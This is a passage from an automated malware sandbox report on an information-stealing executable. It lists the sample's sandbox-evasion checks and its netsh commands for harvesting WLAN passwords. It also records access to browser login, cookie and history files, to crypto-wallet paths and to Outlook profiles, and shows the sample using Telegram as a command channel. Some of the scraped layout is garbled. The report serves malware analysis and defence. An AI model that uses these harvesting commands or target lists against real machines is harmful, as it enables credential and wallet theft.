                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 597920Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 595773Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 595666Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 595540Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 595406Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWindow / User API: threadDelayed 2800Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWindow / User API: threadDelayed 6983Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -598153s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -598140s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -598031s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -597920s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -200000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99872s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99765s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99656s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99547s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99422s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99312s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99203s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99094s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -98969s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -98859s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -98724s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -98578s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -98440s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -98312s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -98203s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -98094s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -97984s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -595773s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -595666s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -595540s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -595406s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99807s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99683s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99573s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636Thread sleep time: -99464s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 598153Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 598140Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 598031Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 597920Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 100000Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99872Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99765Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99656Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99547Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99422Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99312Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99203Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99094Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 98969Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 98859Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 98724Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 98578Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 98440Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 98312Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 98203Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 98094Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 97984Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 595773Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 595666Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 595540Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 595406Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99807Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99683Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99573Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeThread delayed: delay time: 99464Jump to behavior
                            Source: Amcache.hve.13.drBinary or memory string: VMware
                            Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
                            Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
                            Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
                            Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
                            Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                            Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                            Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                            Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga 3d
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Info.txt.0.drBinary or memory string: VirtualMachine: False
                            Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                            Source: K6aOw2Jmji.exeBinary or memory string: VirtualMachine:
                            Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                            Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2161581368.00000267E9780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: Amcache.hve.13.drBinary or memory string: vmci.sys
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780099000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA 3D
                            Source: Amcache.hve.13.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780099000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Video
                            Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
                            Source: K6aOw2Jmji.exeBinary or memory string: vmicshutdown
                            Source: K6aOw2Jmji.exeBinary or memory string: vmware
                            Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
                            Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                            Source: Amcache.hve.13.drBinary or memory string: VMware20,1
                            Source: K6aOw2Jmji.exeBinary or memory string: vmicvss
                            Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
                            Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
                            Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                            Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                            Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                            Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                            Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
                            Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
                            Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
                            Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                            Source: K6aOw2Jmji.exeBinary or memory string: vmicheartbeat
                            Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: K6aOw2Jmji.exe, Decryptor.csReference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
                            Source: K6aOw2Jmji.exe, Decryptor.csReference to suspicious API methods: WinApi.GetProcAddress(_hNss3, "NSS_Init")
                            Source: K6aOw2Jmji.exe, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior

                            Language, Device and Operating System Detection

                            barindex
                            Source: Yara matchFile source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeQueries volume information: C:\Users\user\Desktop\K6aOw2Jmji.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                            Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                            Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
                            Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163823650.00000267E9EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH.zip, type: DROPPED
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore2
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: &C:\Users\user\AppData\Roaming\Binance2
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum\keystore
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                            Source: Yara matchFile source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH.zip, type: DROPPED
                            Source: Yara matchFile source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                            Windows Management Instrumentation
                            1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            11
                            Disable or Modify Tools
                            1
                            OS Credential Dumping
                            124
                            System Information Discovery
                            Remote Services1
                            Archive Collected Data
                            1
                            Web Service
                            Exfiltration Over Other Network Medium1
                            Data Encrypted for Impact
                            CredentialsDomainsDefault Accounts1
                            Native API
                            1
                            Scheduled Task/Job
                            11
                            Process Injection
                            1
                            Obfuscated Files or Information
                            1
                            Input Capture
                            1
                            Query Registry
                            Remote Desktop Protocol2
                            Data from Local System
                            1
                            Ingress Tool Transfer
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Scheduled Task/Job
                            Logon Script (Windows)1
                            Scheduled Task/Job
                            1
                            Software Packing
                            Security Account Manager241
                            Security Software Discovery
                            SMB/Windows Admin Shares1
                            Screen Capture
                            11
                            Encrypted Channel
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            Timestomp
                            NTDS1
                            Process Discovery
                            Distributed Component Object Model1
                            Email Collection
                            3
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading
                            LSA Secrets251
                            Virtualization/Sandbox Evasion
                            SSH1
                            Input Capture
                            14
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Masquerading
                            Cached Domain Credentials1
                            Application Window Discovery
                            VNC1
                            Clipboard Data
                            Multiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                            Virtualization/Sandbox Evasion
                            DCSync1
                            System Network Configuration Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                            Process Injection
                            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565209 Sample: K6aOw2Jmji.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 47 api.telegram.org 2->47 49 54.229.13.0.in-addr.arpa 2->49 51 4 other IPs or domains 2->51 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 67 15 other signatures 2->67 8 K6aOw2Jmji.exe 14 118 2->8         started        13 msiexec.exe 2->13         started        signatures3 65 Uses the Telegram API (likely for C&C communication) 47->65 process4 dnsIp5 53 api.telegram.org 149.154.167.220, 443, 49736 TELEGRAMRU United Kingdom 8->53 55 store5.gofile.io 31.14.70.244, 443, 49740 LINKER-ASFR Virgin Islands (BRITISH) 8->55 57 3 other IPs or domains 8->57 39 C:\Users\user\AppData\...\VLZDGUKUTZ.docx, ASCII 8->39 dropped 41 C:\Users\user\AppData\...\KATAXZVCPS.pdf, ASCII 8->41 dropped 43 C:\Users\user\AppData\...\DVWHKMNFNN.png, ASCII 8->43 dropped 45 3 other malicious files 8->45 dropped 69 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->69 71 Tries to steal Mail credentials (via file / registry access) 8->71 73 Found many strings related to Crypto-Wallets (likely being stolen) 8->73 75 4 other signatures 8->75 15 cmd.exe 1 8->15         started        18 WerFault.exe 19 16 8->18         started        21 cmd.exe 1 8->21         started        file6 signatures7 process8 file9 77 Uses netsh to modify the Windows network and firewall settings 15->77 79 Tries to harvest and steal WLAN passwords 15->79 23 netsh.exe 2 15->23         started        25 conhost.exe 15->25         started        27 findstr.exe 1 15->27         started        29 chcp.com 1 15->29         started        37 C:\ProgramData\Microsoft\...\Report.wer, 